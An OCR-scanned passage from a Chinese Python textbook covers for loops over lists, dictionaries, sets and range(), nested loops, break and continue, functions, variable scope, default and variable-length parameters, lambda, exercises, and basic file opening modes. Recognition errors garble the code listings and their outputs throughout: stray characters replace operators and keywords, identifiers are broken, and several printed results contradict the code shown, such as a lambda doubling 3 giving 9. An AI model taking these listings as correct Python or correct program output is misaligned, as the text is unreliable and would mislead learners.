7. print("1+2+...+100=",sunm) 


3.3.2 for 循环 
其 他 的 编程 语言 中 ,有 for 循环 ,Python 中 也 提供 了 for 循环 语句 ,for 循环 接收 序列 、 
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字典 或 集合 等 可 迭代 对 象 作 为 其 参数 ,每 次 循环 取出 其 中 的 一 个 元 素 。 
1. 基于 序列 的 for 循环 
序列 是 Python 中 非常 有 用 的 一 种 数据 结构 ,通过 for 循环 可 以 访问 序列 中 的 每 个 
元 素 。 
例 [ch3_3_2forl.py】 
井 coding:utf 一 8 
Sum = 0 
lista = [1,6,34,26,56,2,9,86,23] 


for i in lista: 
sum = sum +i 


ou 中 wb PP 


Print("sum= ",sum) 


2. 基于 字典 的 for 循环 
前 文 已 经 介绍 过 ,字典 包括 “ 键 " 和 * 值 ”, 通 过 对 “ 键 ”" 的 迭代 可 以 访问 字典 中 的 每 个 值 。 
例 [ch3_3_2for2. py】 


#coding:utf -8 
dicta= {' 体 育 ':78, ' 英 语 ':86, ' 操 作 系 统 ':93, ' 网 络 安全 ':63, ' 网 络 编程 ':74} 
sum=0 
avr=0 
for key in dicta. keys(): 
sum = sum + dicta[key] 
avr = sum/ len(dicta) 
print(" 总 成 绩 : ",sum) 
Print(" 平 均 成 绩 : ",avr) 


omwaouw 必 wm 


生 说 明 : 第 5 行 ,使 用 for 循环 对 字典 dicta 的 “ 键 "集合 进行 碗 代 访问 。 

第 6 行 ,dictaLkey] 获 取 键 为 key 的 值 ,并 将 它 加 到 sum 变量 中 。 

3. 基于 for 迭代 访问 集合 

集合 是 一 个 无 序 对 象 的 集合 ,对 于 集合 的 访问 可 以 采用 for 迭代 的 方式 进行 。 
例 [ch3_3_2for3.py】 

#coding:utf—8 

set a = {1,3,34,31,67,98, - 12,0,65} 

sum = 0 


for i in set a: 


sum = Sum 二 i 


auAwWDp 


print("sum = ", sum) 

说明: 第 4 行 ,通过 for 循环 对 集合 set_a 进行 办 代 访问 。 

4. 基于 range() 函 数 的 计数 循环 

Python 中 内 置 的 range() 函 数 可 以 生成 一 个 数据 序列 ,对 该 数据 序列 进行 闪 代 访问 , 即 


可 精确 控制 for 循环 的 次 数 。range() 函数 需 要 3 个 参数 ,第 一 个 参数 为 序列 的 起 始 值 ,第 二 
个 参数 为 序列 的 终止 值 (不 包括 该 值 ) ,第 三 个 参数 为 步 长 。 


下 面 列举 求 1 一 100 所 有 偶数 的 和 。 
例 [ch3 3_2_for4.py】 


#coding:utf -8 
sum= 0 


2 

2 

3. for i in range(2,101,2): 
4 sum = Sum + i 

5 


print("sum= ", sum) 


(可 说 明 ， range(2,101,2) 函 数 生 成 一 个 从 2 开始 ,到 101 结束 , 步 长 是 2 的 序列 ,这 
里 需要 说 明 的 是 ,终止 值 为 101, 而 不 是 100, 是 因为 range() 函 数 生成 的 序列 不 包括 终止 值 ， 
为 了 包括 100, 这 里 把 终止 值 设 为 101 ,而 不 是 100。 


3.3.3 循环 嵌 套 

在 一 些 问 题 的 解决 中 ,有 两 个 以 上 的 因素 影响 代码 块 的 执行 次 数 , 这 时 需要 把 代码 块 放 
到 嵌 套 的 多 重 循环 中 ,这样 就 形成 了 循环 嵌 套 。 

例如 ,程序 输出 9X9 乘法 表 , 就 需要 使 用 循环 媒 套 输出 9X9 乘法 表 。 

例 [ch3_3_3. py】 


1 #coding:utf—8 

得 for i in range(1,10) : 

下 for j in range(1,i+1): 

4 print("%dx %d= Sd"%(i,j,i#j),end = '') 
5 print() 

程序 运行 结果 : 


1x1=1 

2x1=22x2=4 

EE 

4x1=44X2=8 4x3=124x4=16 

5X1=55X2=105x3=155X4=205X5=25 
6xl=66x2=126x3=186x4=246x5=306x6=36 
7XxLis=77x2=147x3e=217x4=287Xx5=357X6=427X7=49 
8xl=88x2=168x3=248x4=328x5=408x6=488x7=568x8=64 
9xTl=99x2=189X3=27 9x4=36.9X5=459x6=549x7=639X8=729X9= 681 


(可 说 明 : 第 2 行 ,控制 给 出 的 行 数 ,这 里 循环 9 次 ,不 包括 10。 

第 3 行 ,控制 每 行 输出 乘法 式 的 个 数 ,每 行 输出 式 子 个 数 为 i。 

第 4 行 ,print() 函 数 默 认 每 次 输出 会 附加 一 个 换行 符 , 为 了 让 每 个 式 子 输出 后 不 换行 ， 
函数 后 用 end 一 '' 表 示 一 个 空格 结束 ,而 不 是 默认 的 换行 。 

第 5 行 , 当 第 i 个 式 子 输出 完成 后 ,用 print() 函 数 输出 一 个 换行 符 , 下 次 输出 从 下 一 行 
开始 。 


3.3.4 ”break 和 continue 语句 
break 语句 在 while 与 for 循环 中 都 可 以 用 ,用 于 提前 结束 循环 。break 一 般 与 if 配合 
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使 用 ,判断 条 件 , 当 条 件 满足 时 ,就 会 执行 break 语句 提前 结束 循环 。 

在 猜 一 猜 是 哪个 数 游戏 中 ,程序 生成 一 个 随机 数 , 然 后 让 你 猜 , 如 果 大 于 这 个 数 , 则 输出 
“ 猜 大 了 ?”; 如 果 小 于 这 个 数 , 则 输出 * 猜 小 了 ”。 当 猜 对 后 ,输出 * 猜 对 了 ”, 结 束 程序 。 

例 [ch3_3_4break. py】 


1. 井 coding:utf 一 8 

汪 from random import randint 

3. numa = randint(1,100) 

4. numstr = input(" 请 猜 一 猿 ,这 个 数 是 多 少 (1 一 100)?") 
5. while True: 

6 numint = int(numstr) 

于 if numint > numa: 

8 print(" 猜 大 了 ") 

9 


elif numint < numa: 


10. print(" 猿 小 了 ") 

4 else: 

12. break 

33， numstr = input(" 再 猜 一 次 吧 : ") 
14，print(" 你 猜 对 了 ") 

bE 


全 说 明 : 第 2 行 ,从 random 模块 中 导入 randint() 函 数 。 

第 3 行 , 生 成 一 个 1 一 100 的 随机 整数 ,并 赋值 给 numa。 

第 4 行 ,用 户 输入 一 个 字符 型 数字 。 

第 5 行 , while 循环 的 条 件 为 永 真 的 ,也 就 是 说 循环 会 不 断 循环 下 去 。 

在 循环 体 中 ,首先 将 输入 的 字符 型 数字 转换 为 数字 ,然后 ,对 用 户 的 输入 值 进行 判断 , 若 
输入 值 大 于 随机 数 , 则 输出 “ 猜 大 了 ”; 若 输入 值 小 于 随机 数 , 则 输出 “ 猜 小 了 ”; 若 输入 值 等 
于 上 面 生成 的 随机 数 , 则 执行 break 语句 结束 循环 ,最 后 打印 “ 猜 对 了 ?”。 

continue 语句 在 while 和 for 循环 中 起 到 提前 结束 本 次 循环 的 作用 ,并 忽略 continue 后 
面 的 语句 ,然后 回 到 循环 的 顶端 ,继续 执行 下 一 次 循环 。 对 于 刚 学 编程 的 初学 者 来 说 ,一 定 
要 注意 区 分 break 与 continue 的 不 同 作 用 : break 语句 执行 后 ,会 退出 整个 循环 ,不 再 执行 
循环 体 中 的 语句 ; continue 语句 不 会 退出 循环 ,而 是 忽略 本 次 循环 剩余 语句 ,提前 进入 下 一 
轮 循环 。 

例如 ,使 用 while 循环 求 1 一 100 奇数 的 和 。 

例 [ch3_3_4continue. py】 


1. #coding:utf—8 

2. sum=0 

3, =0 

4. while i<100: 

5. i=i+1 

6. if i%2==0: 

了 continue 

8. print("i= 和 要 d" 和 要) 
9. sum= Sum 十 工 


10. print("1 一 100 奇数 的 和 为 sd" % sum) 


(村 说 明 : 第 6 行 ,判断 i 是 否 为 偶数 , 若 为 偶数 , 则 执行 第 7 行 continue 结束 本 次 条 
环 ; 若 为 奇数 , 则 执行 第 8 行 、 第 9 行 输出 i 的 值 , 并 将 i 加 到 sum 变量 中 。 


3.4 还 数 


函数 是 由 若干 语句 组 成 ,具有 特定 功能 的 一 段 代码 ,函数 由 函数 名 参数、 函数 体 和 返回 
值 组 成 ,在 需要 该 功能 的 地 方 就 可 以 调用 它 , 函 数 的 出 现 极 大 地 方便 了 代码 的 共享 与 复 用 。 
Python 中 除了 系统 自 带 的 函数 外 ,用 户 可 以 自己 定义 函数 ,实现 自 定 义 的 功能 。 
3.4.1 函数 的 定义 与 调用 
函数 的 定义 是 通过 关键 字 def 实现 的 , 自 定义 函数 的 语法 如 下 : 
def 函数 名 (参数 ) : 
函数 体 
函数 名 不 要 与 Python 关键 字 重 合 , 最 好 是 有 意义 的 名 称 , 参 数 可 以 有 ,也 可 以 没有 ( 即 
参数 为 空 ), 多 个 参数 之 间 用 逗号 分 开 , 函 数 名 的 最 后 有 一 个 冒号 (:) 表 示 函 数 体 的 开始 ， 
函数 体 可 以 是 一 条 语句 ,也 可 以 是 多 条 语句 ,Python 语言 的 函数 中 没有 标明 函数 开始 与 
结束 的 “{)”, 而 是 通过 缩 进 表示 它 是 函数 的 函数 体 。 在 需要 的 地 方 通过 函数 名 调用 
函数 。 
1. 没有 参数 的 函数 
下 面 定义 一 个 显示 欢迎 信息 的 函数 。 
例 [ch3_4_ldispwelcomel. py】 
#coding:utf -8 
def dispwelcome( ): 


a 
2 
print(" 欢 迎 来 到 Python 世界 ") 
4 


dispwelcome() 
程序 运行 结果 : 


欢迎 来 到 Python 世界 


程序 中 定义 了 一 个 名 为 dispwelcome() 的 函数 ,这 个 函数 没有 使 用 任何 参数 ,因此 括号 
中 没有 定义 任何 变量 。 函 数 的 功能 非常 简单 ,只 是 打印 一 个 欢迎 信息 。 在 程序 中 ,通过 函数 
名 dispwelcome() 调 用 郴 数 。 

2. 有 参数 的 函数 

在 上 面 的 例子 中 ,没有 给 函数 传递 参数 ,功能 比较 单一 ,下 面 给 函数 传递 参数 ,让 函数 的 
功能 更 强大 一 些 。 

例 [ch3_ 4_1ldispwelcome2. py】 


1. #coding:utf—8 
2. def dispwelcone(name) : 
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也 print(" 欢 迎 % s 来 到 Python 世界 " % name) 


4. dispwelcome("Tom") 
程序 运行 结果 : 
欢迎 Tom 来 到 Python 世界 


程序 定义 了 一 个 函数 dispwelcome(name) ,括号 中 的 name 用 于 接收 参数 值 , 称 为 形式 参 
数 , 简 称 形 参 函数 体 只 有 一 个 print 语句 ,%s 表示 输出 一 个 字符 串 ,输出 的 内 容 为 %name 的 
值 。 调 用 函数 时 ,直接 用 函数 名 调用 即 可 , 传 给 函数 的 参数 值 "Tom ", 称 为 实 参 。 加 入 参数 以 
后 ,函数 比 前 一 个 例子 的 功能 更 强大 、 更 通用 ,根据 传递 实 参 的 不 同 可 以 显示 不 同 的 欢迎 信息 。 

3. 有 返回 值 的 函数 

函数 实现 一 定 功能 后 ,可 能 会 得 到 一 个 结果 ,需要 将 该 结果 返回 给 调用 者 ,这 时 就 用 到 了 
return 语句 ,把 结果 返回 给 调用 者 。 下 面 定义 一 个 函数 , 求 两 个 参数 中 较 大 的 一 个 并 返回 。 

全 [ch3_4_lreturn. py】 


1 #coding:utf—8 

2. def max(a,b): 

3 if a>b: 

4 return a 

5 else: 

6. returnb 

7 

BB 5 

和 

10. print("%d,%d 中 较 大 的 一 个 是 %d" % (x,y, max(x,y))) 


程序 运行 结果 : 
5,7 中 较 大 的 一 个 是 7 


程序 中 定义 了 一 个 函数 max(a,b), 然 后 对 a 和 bb 的 值 进行 比较 ,车 a 大 于 b, 则 用 
return a 返回 a 的 值 ; 车 a 小 于 等 于 b, 则 用 return b 返回 b 的 值 。 若 一 个 函数 没有 return 
语句 , 则 相当 于 return None,None 是 Python 中 一 个 非常 重要 的 符号 ,表示 空 值 。 


3.4.2 变量 的 作用 域 


程序 中 值 可 以 变化 的 量 称 为 变量 ,变量 定义 的 位 置 不 同 , 它 的 作用 范围 也 不 同 , 这 个 作 
用 范围 称 为 作用 域 。 在 函数 内 部 定义 的 变量 , 它 的 作用 范围 仅 限 于 函数 内 , 称 为 局 部 变量 ; 
在 函数 外 部 定义 的 变量 , 它 的 作用 范围 是 整个 程序 , 称 为 全 局 变量 。 当 一 个 局 部 变量 与 一 个 
全 局 变量 重 名 时 ,在 函数 内 部 引用 该 变量 , 则 它 的 值 应 该 是 局 部 变量 的 值 ; 在 函数 外 部 引用 
该 变量 时 , 它 的 值 应 该 是 全 局 变量 的 值 , 应 该 注意 区 分 。 

1. 局 部 变量 

例 [ch3_4_2localvar. py】 


1. #coding:utf—8 


2. def func() : 

3» x=1 并 局 部 变量 
4 交 到 沪 记 和 导 

5. print(" 函 数 内 x= %d"%x) 

6. x = 10 并 全 局 变量 
7. print(" 调 用 函数 前 x= %d" %x) 

8 func() 

9. print(" 调 用 函数 后 x= %d" %x) 

程序 运行 结果 : 

调用 函数 前 x= 10 

函数 内 x= 6 

调用 函数 后 x= 10 


在 这 个 程序 中 ,在 函数 内 部 定义 了 一 个 变量 x, 它 是 局 部 变量 ,在 函数 外 部 也 定义 了 一 
个 变量 x, 它 是 全 局 变量 ,尽管 两 个 变量 的 名 字 都 叫 x, 但 它们 是 两 个 不 同 的 变量 。 在 主 程序 
中 ,起 作用 的 是 全 局 变量 x, 在 函数 内 部 起 作用 的 是 局 部 变量 x。 

2. 全 局 变量 

在 函数 外 部 定义 的 变量 是 全 局 变量 ,函数 内 部 定义 的 变量 是 局 部 变量 ,两 者 是 互 不 干扰 
的 。 如 果 在 函数 内 需要 引用 全 局 变量 的 值 ,这 时 ,就 用 到 了 关键 字 global, 用 它 来 修饰 变量 ， 
表示 该 变量 是 全 局 变量 。 

global 的 语法 如 下 : 


global 变量 1, 变量 2, …, 变 量 n 
若 在 主 程序 中 已 经 定义 了 一 个 全 局 变量 ,在 函数 内 部 需要 引用 它 , 则 在 变量 名 前 加 


global 修饰 该 变量 ,表示 引用 的 是 全 局 变量 。 
例 [ch3_4_2globalvarl. py】 


1. #coding:utf—8 

2. def func(): 

3, global x 

4. x=x+5 

print(" 函 数 内 x= %d"%x) 
6 X= 

7. print(" 调 用 函数 前 x= %d" %x) 
8. func() 

9. print(" 调 用 函数 后 x= %d" %x) 
程序 运行 结果 : 

调用 函数 前 x= 10 

函数 内 x= 15 

调用 函数 后 x= 15 


(村 说 明 : 第 3 行 ,用 global 修饰 x, 说 明 x 是 全 局 变量 ,那么 它 的 值 此 时 应 该 是 10。 
第 4 行 ,x 一 x 十 5, 其 实质 是 x 一 10 十 5, 所 以 这 时 的 x 是 15, 所 以 第 5 行 输出 的 内 容 是 
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第 6 行 ,在 主 程序 中 定义 了 一 个 变量 x, 并 赋值 为 10。 

第 7 行 ,输出 调用 函数 前 x 的 值 。 

第 8 行 ,调用 函数 。 

第 9 行 ,调用 函数 后 ,输出 x 的 值 , 因 x 在 函数 内 部 被 修改 过 ,所 以 这 时 x 的 值 为 15。 

当 全 局 变量 在 主 程序 中 没有 定义 ,在 函数 内 部 可 以 用 “global 变量 ”直接 定义 一 个 全 局 
变量 。 

例 [ch3_4_2globalvar2. py】 


1. #coding:utf—8 

2. def func(): 

3 global x 

4. x= 10 # 引 前 需要 对 x 先 赋值 
5 诡 - 押 这 水 汪 

6. print(" 函 数 内 x= $%d" gx) 

A 

8. #print(" 调 用 也 数 前 x= %d" %x) # 未 定义 变量 x, 直接 引用 ,会 出 错 的 
9. func() 

10. print(" 调 用 函数 后 x= %d"%x) 

程序 运行 结果 : 

函数 内 x= 15 

调用 函数 后 x= 15 


全 说 明 : 第 3 行 ,定义 一 个 全 局 变量 x。 

第 4 行 ,将 x 赋值 为 10, 若 不 赋值 也 会 出 错 的 。 

第 5 行 ,运行 x 二 x 十 5, 此 时 x 的 值 为 15。 

第 8 行 ,在 主 程序 中 没有 定义 变量 x, 如 果 直 接 引用 x, 输 出 它 的 值 , 则 会 出 错 , 这 里 加 
“ 间 ” 注 释 掉 该 身 。 

第 9 行 ,调用 函数 func()。 

第 10 行 ,调用 函数 后 ,输出 x 的 值 ,发 现 它 的 值 就 是 15。 


3.4.3 参数 的 默认 值 


为 了 提高 程序 的 鲁 棒 性 (也 称 为 强壮 性 ) ,可 以 给 函数 的 形 参 赋 默 认 值 ,如 果实 参 没有 值 
传 给 形 参 , 则 形 参 使 用 默认 值 ; 如 果实 参 有 值 传 给 形 参 , 则 形 参 使 用 传 过 来 的 值 。 若 函数 有 
多 个 形 参 , 有 的 形 参 有 默认 值 , 有 的 形 参 没 有 默认 值 , 则 把 有 默认 值 的 形 参 放 在 形 参 列表 的 
后 面 ,把 没有 默认 值 的 形 参 放 在 形 参 列表 的 前 面 ,这 是 因为 Python 是 根据 参数 的 位 置 给 形 
参 传递 值 的 ,这 一 点 请 注意 。 

例 [ch3_4_3defaultval. py】 

1. #coding:utf—8 


2. def dispmessage(message, times=1): 
和 print(message * times) 


4. dispmessage("Hello") 
5. dispmessage("Hello",3) 


程序 运行 结果 : 


Hello 
HelloHelloHello 


(可 说 明 : 第 2 行 ,定义 了 一 个 函数 dispmessage (message, times 二 1), 其 中 形 参 
message 没有 默认 值 ,times 有 默认 值 1。 

第 3 行 ,输出 times 次 message。 

第 4 行 ,只 给 函数 传递 了 一 个 值 “Hello”, 这 个 值 传 给 了 形 参 message,times 使 用 默认 
值 1。 

第 5 行 ,调用 函数 且 传 递 了 两 个 参数 ,这 时 ,times 使 用 了 传 过 来 的 值 3。 

如 果 函 数 有 多 个 形 参 且 有 默认 值 ,调用 函数 时 ,只 想 传 递 非 默 认 值 的 参数 ,这 时 怎么 办 
呢 ? 调 用 函数 时 ,可 以 在 实 参 列表 中 ,给 实 参 前 面 加 上 参数 的 名 字 ,指定 这 个 值 是 传 给 哪个 
形 参 的 。 

例 [ch3_4 3keypara. py】 


1. #coding:utf-8 

2. def sum(a,b,c=1,d=2,e=3): 
入 print("a= %db= %dc= %dd= %de= %d"s%(a,b,c,d,e)) 
4. return a+b+c+d+e 

5, 

6. Pprint(sum(1,2,3,4,5)) 

7. print(sum(1,2)) 

8. #print(sum(1)) 

9. print(sum(1,2,d= 10)) 
程序 运行 结果 : 
a=lb=2c=3d=4e=5 

5 

a=lb=2c=ld=2e=3 

9 

a=lb=2c=1d=10e=3 

17 


(村 说 明 : 第 2 行 ,定义 了 一 个 画 数 sum() ,其 中 参数 a.b 没有 默认 值 ,c.de 有 默认 值 。 

第 3 行 ,输出 a、b、c、de 的 值 。 

第 6 行 , 调 用 sum() 函 数 ,每 个 参数 都 赋 了 值 ,所 以 sum() 函 数 是 按 传 过 来 的 1.2、3、4、 
5 计算 的 和 。 

第 7 行 , 调 用 sum() 函 数 ,a 王 1,b 王 2,c\.d\e 没 有 传 值 , 则 函数 是 按 默认 值 计 算 的 。 

第 8 行 ,调用 sum() 函 数 , 只 传递 了 一 个 参数 ,而 函数 需要 至 少 两 个 参数 ,运行 会 出 现 错 
误 , 因 此 把 此 名 注释 掉 。 
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第 9 行 , 调 用 sum() 函 数 ,传递 了 两 个 参数 1.2 和 d 一 10, 函 数 接收 到 的 值 是 这 样 的 ; 
a 二 1,b 二 2,c 没 有 接收 到 值 则 使 用 默认 值 1,d 使 用 传递 过 来 的 10,e 没有 接收 到 值 则 使 用 
默认 值 3。 


3.4.4 ”可 变 长 参数 


前 面 的 例子 中 , 形 参 和 实 参 的 个 数 都 是 固定 的 ,可 不 可 以 设计 参数 个 数 不 固 定 的 函数 
呢 ? Python 支持 可 变 长 度 参数 。 当 参数 是 可 变 长 度 时 ,只 需 在 参数 前 加 * 就 可 以 了 。 这 时 
的 参数 是 按照 一 个 元 组 来 对 待 的 。 

例 [ch3_4_4varilen. py】 


1. #coding:utf-8 

2. def sum( * v) : 并 v 为 可 变 长 形 参 ,前 面 加 有 * 
3 print(" 参 数 长 度 为 %d" % len(v)) #1len(v) 求 v 的 长 度 

4. sum= 0 

5, for i inv: 并 对 vv 中 的 每 个 元 素 枚 举 ,然后 求 和 
6. sum = sum+i 

return sum 

8 

9. print(sum(1,2,3,4,5)) 并 给 sum( ) 函数 传递 5 个 值 
10. print(sum(1,2)) # 给 sum() 函 数 传递 2 个 值 
程序 运行 结果 : 

参数 长 度 为 5 

15 

参数 长 度 为 2 

3 


Python 中 还 提供 了 另外 一 个 标识 符 ** ,表示 可 变 长 参数 将 被 当 作 一 个 字典 。 如 : 
例 [ch3_4_4dstar. py】 


#coding:utf 一 8 

2. def sum( * xv): 划 函 数 会 把 传 过 来 的 可 变 长 参数 当 作 字典 
] counts = len(v) # 求 字典 的 元 素 个 数 

4 print(" 共 有 %d 门 课程 "% (counts)) 

5. sum = 0 

6 for subj in v.keys() : 井 枚 举 字 典 元 素 

时 print("%s : %d" 当 (subj，v[subj])) # 显示 字典 的 键 和 值 

8 sum = sum+v[subj] # 对 字典 的 值 求 和 

9 return sum 


10. 
11. scores = sum(Chinese=95,English=78, 数 学 =56) # 传 参数 
12. print(" 总 分 为 %d"% scores) 


程序 运行 结果 : 


共有 3 门 课程 
数学 : 56 


( 千 说 明 : 第 2 行 ,定义 了 一 个 函数 , 形 参 为 xx v, 则 把 传 过 来 的 参数 当 作 字典 对 待 , 参 


数 名 为 字典 的 键 , 参 数 的 值 为 字典 的 值 。 


第 6 一 8 行 ,对 字典 的 值 求 和 。 
第 11 行 ,调用 函数 ,参数 名 为 科目 名 称 , 参 数值 为 科目 分 数 ,注意 : Python 3 是 支持 中 


文 作为 变量 名 的 。 


3.4.5 lambda() 匿 名 函数 


Python 中 提供 了 lambda() 匿 名 函数 ,lambda 的 语法 如 下 : 
lambda 参数 列表 :表达 式 
参数 列表 是 传递 参数 给 lambda() 匿 名 函数 的 参数 ,可 以 是 一 个 参数 ,也 可 以 是 多 个 参 


根据 参数 ,表达 式 进行 某 种 运算 ,表达 式 的 值 就 是 lambda( ) 匿 名 函数 的 值 。 
定义 只 有 一 个 参数 的 函数 : 


>p> = lambda x:Xx *2 
>>> f(3) 


9 


定义 有 多 个 参数 的 函数 : 


>>>f£ = lambda x,y:x*y 
>>> print(f(1,4)) 


4 


定义 有 多 个 参数 且 有 默认 值 的 函数 : 


>>g = lambda x,y=3,z=5:x+y+z 
>>> g(1) 


3 


>>> g(1,2) 


8 


>>> g(1,4,8) 


3 


其 实 上 面 的 例子 完全 可 以 用 相应 的 函数 实现 ,lambda() 匿 名 函数 只 是 简化 了 函数 定义 


的 书写 形式 。 使 代码 更 加 简洁 ,但 是 使 用 函数 的 定义 方式 更 加 直观 ,易于 理解 。 


使 用 lambda 生成 列表 : 
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>>> lista = [lambda x:x* 2, lambda x:x* x*2, lambda x:x* 关 3] 
>>> print(lista[0](3),1ista[1](3), lista[2](3)) 


6927 


上 面 的 第 一 个 语句 定义 了 一 个 列表 lista, 它 有 三 个 元 素 , 第 一 个 元 素 为 x*2; 第 二 个 
元 素 为 x xx 2; 第 三 个 元 素 为 xxx 3。 

第 二 句 表 示 打 印 列表 的 元 素 , 第 0 个 列表 元 素 参数 值 为 3, 第 1 个 列表 元 素 参数 值 为 3， 
第 2 个 列表 元 素 参数 值 为 3, 因此 打印 的 值 为 6、9、27。 

使 用 lambda 生成 字典 : 

>>> dicta = {"keyl":lambda x:x* 2, "key2":lambda x:x* *2,"key3":lambda x:xx x* 3} 

>>> dicta[ 'key1'](2) 


4 


>>> dicta[ "key2" ] (3) 


9 


>>> dicta[ "key3"](2) 


上 面 的 第 一 个 语句 定义 了 一 个 字典 ,字典 第 一 个 元 素 的 键 为 keyl , 值 为 x* 2; 字典 第 
二 个 元 素 的 键 为 key2 , 值 为 xx*x 2; 字典 第 三 个 元 素 的 键 为 key3 , 值 为 x** 3。 因 此 , 传 2 
后 ,keyl 的 值 为 4; 传 3 后 ,key2 的 值 为 9; 传 2 后 ,key3 的 值 为 8。 

从 上 面 的 代码 可 以 看 出 ,lambda() 匿 名 函数 的 使 用 大 量 简化 了 代码 ,使 代码 简练 清晰 。 
但 值得 注意 的 是 : 这 会 在 一 定 程度 上 降低 代码 的 可 读 性 。 如 果 不 是 非常 熟悉 Python 的 
人 或 许 会 对 此 感到 不 可 理解 。@@ 用 lambda 在 语句 中 定义 的 匿名 函数 ,在 别处 是 不 能 复 用 
的 ,因此 也 降低 了 代码 的 复 用 性 。 因 此 ,如 果 可 以 使 用 for...in...if 来 完成 的 ,尽量 不 用 
lambda() 匿 名 函数 。 


习 题 


一 、 判 断 题 

1. Python 函数 不 可 以 传递 变 长 的 参数 。 

2. while 通常 用 于 循环 次 数 不 确 定 的 循环 。 

3. range(1,100) 生 成 的 序列 中 包括 100 。 

4. lambda() 匿 名 函数 可 以 提高 程序 运行 效率 。 

5. 函数 带 默认 值 的 参数 可 以 放 在 参数 列表 任意 位 置 。 

6. 可 以 在 Python 函数 内 部 声明 全 局 变量 。 

二 、 编 程 题 

1. 用 input() 函数 输入 一 个 整数 ,判断 这 个 数 是 偶数 还 是 奇数 ,然后 显示 “偶数 ”或 
“奇数 ”。 


一 一 一 一 一 一 
A 


2. 某 市 新 建成 了 地 铁 ,车 票 的 价格 是 这 样 的 : 1 一 4 站 2 元 ,5~7 站 3 元 ,7 一 9 站 4 元 ， 
10 站 以 上 5 元 ,请 设计 程序 ,输入 人 数 n, 站 数 m, 然 后 显示 票 价 。 

3. 输入 三 角形 的 三 条 边 长 ,然后 显示 三 角形 的 类 型 (等 腰 三 角形 、 等 边 三 角形 直角 三 
角形 .普通 三 角形 ) 。 

4. 编程 计算 下 列 函数 的 值 : 





ZX 二 3 <—10 
y= 三 4T 十 37 十 1] 一 0 之 z+ 二 10 
57—12 并 过 10 


5. 输入 三 个 数 , 按 升序 排列 输出 。 

6. 使 用 两 种 不 同 的 方法 计算 100 以 内 所 有 奇数 的 和 。 

7. 判断 一 个 数 是 否 为 素数 。 

8. 求 200 以 内 能 被 17 整除 的 最 大 正 整数 。 

9. 已 知 斐 波 那 契 数列 的 第 1 项 为 0, 第 2 项 为 1, 从 第 3 项 开始 是 前 两 项 的 和 ,如 0,1， 
1,2,3,5,8… ,编程 求 该 数列 的 前 20 项 。 

10. 使 用 循环 输出 下 列 图 形 。 
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4.1 文件 的 基本 操作 


文件 是 存储 在 外 部 介质 上 的 数据 的 集合 , 正 是 因为 有 了 文件 才能 够 把 计算 机 处 理 的 中 
间 结 果 或 最 终结 果 保 存 下 来 。 文 件 按照 组 织 形式 可 以 分 为 文本 文件 和 二 进 制 文件 。 

1. 文本 文件 

文本 文件 是 指 文件 的 内 容 是 常规 字符 串 , 每 个 字符 串 以 \n 换行 符 结束 ,可 以 用 
Windows 平台 下 的 记事 本 或 Linux 平台 下 的 vi 来 编辑 它 。 

2. 二 进 制 文件 

二 进 制 文件 是 把 内 存 中 的 数据 以 字符 串 的 形式 保存 在 外 部 存储 介质 上 ,这 样 的 文件 不 
能 用 文本 编辑 器 编辑 。 如 音频 、 视 频 等 文件 就 是 典型 的 二 进 制 文件 。 

4.1.1 打开 文件 

在 使 用 文件 之 前 ,需要 打开 文件 ,在 Python 中 使 用 open() 函 数 打 开 文 件 ,该 函数 可 以 
指定 文件 名 ,访问 模式 、 缓 存 区 。open() 函数 的 一 般 形式 如 下 : 

open( 文 件 名 [, 访 问 模式 [, 缓 存 区 ]]) 

这 里 的 [为 可 选项 ,使 用 open() 函 数 时 ,必须 有 文件 名 ,打开 方式 与 缓存 区 可 有 可 无 。 

文件 名 是 指 被 打开 的 文件 名 称 。 

访问 模式 是 指 打开 文件 后 ,对 文件 的 处 理 方式 ,访问 模式 参见 表 4-1。 


表 4-1 文件 的 访问 模式 








访问 模式 含义 及 说 明 
到 以 只 读 方 式 打开 文件 , 若 文件 不 存在 , 则 产生 异常 
w 以 只 写 方式 打开 文件 ,此 时 文件 内 容 会 被 清空 , 若 文 件 不 存在 , 则 创建 它 
a 以 追加 方式 打开 ,从 文件 尾部 添加 ,不 删除 原 数 据 , 若 文件 不 存在 , 则 创建 并 打开 
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续 表 

访问 模式 含义 及 说 明 

ii 以 读 / 写 方式 打开 文件 ,不 删除 原 内 容 , 若 文件 不 存在 , 则 产生 异常 

w+ 以 读 / 写 方式 打开 文件 , 若 文 件 不 存在 , 则 创建 并 打开 文件 

a 十 以 读 / 写 方式 打开 文件 ,不 删除 原 内 容 , 若 文件 不 存在 , 则 创建 并 打开 

rb 以 只 读 方 式 打开 二 进 制 文件 , 若 文件 不 存在 , 则 产生 异常 

wb 以 只 写 方式 打开 二 进 制 文件 ,删除 原 内 容 , 若 文件 不 存在 , 则 创建 并 打开 

ab 以 追加 方式 打开 二 进 制 文件 ,在 文件 尾部 添加 数据 , 若 文件 不 存在 , 则 创建 并 打开 
rb+ 以 读 / 写 方式 打开 二 进 制 文件 ,不 删除 原 内 容 , 若 文件 不 存在 , 则 产生 异常 

wb 十 以 读 / 写 方式 打开 二 进 制 文件 ,删除 原 内 容 , 若 文件 不 存在 , 则 创建 并 打开 

ab+ 以 读 / 写 方式 打开 二 进 制 文件 ,只 读 或 从 尾部 添加 , 若 文件 不 存在 , 则 创建 并 打开 





缓存 区 指定 了 读 / 写 文件 的 缓存 模式 ,0 表示 不 缓存 ,1 表示 缓存 ,如 果 大 于 1 则 表示 组 
存 区 的 大 小 ,默认 值 是 缓存 模式 。 


4.1.2 关闭 文件 


文件 打开 操作 以 后 ,最 终 是 要 关闭 的 ,关闭 文件 使 用 close() 方 法 ,关闭 后 ,释放 文件 资 
源 。 具 体 使 用 方法 如 下 : 


f= open( 文 件 名 ,访问 模式 ,缓存 区 ) 
# 对 文件 进行 操作 
f.close() 


4.1.3 读 取 文件 


对 文件 的 读 取 分 为 文本 文件 与 二 进 制 文件 , 读 取 文 件 的 常用 方法 如 下 。 

1. f.read([ size]) 

read() 方 法 将 读 取 文件 的 内 容 ,并 返回 字符 串 ( 在 文本 文件 模式 下 ) 或 者 字 节 对 象 (在 二 
进 制 文件 模式 下 ) ,其 中 size 是 可 选项 ,表示 读 取 文 件 内 容 的 大 小 , 若 省 略 , 则 读 取 并 返回 整 
个 文件 内 容 , 当 然 ,如 果 文 件 长 度 是 内 存 的 两 倍 时 , 则 会 产生 异常 。 若 已 经 到 达 了 文件 尾部 ， 
则 该 方法 会 返回 一 个 空 字符 串 。 

2. f.readline() 

读 取 文 件 的 一 行 ,包括 \n 字符 。 若 已 经 到 达 文 件 的 尾部 , 则 返 加 一 个 空 字符 串 。 

3. f. readlines() 

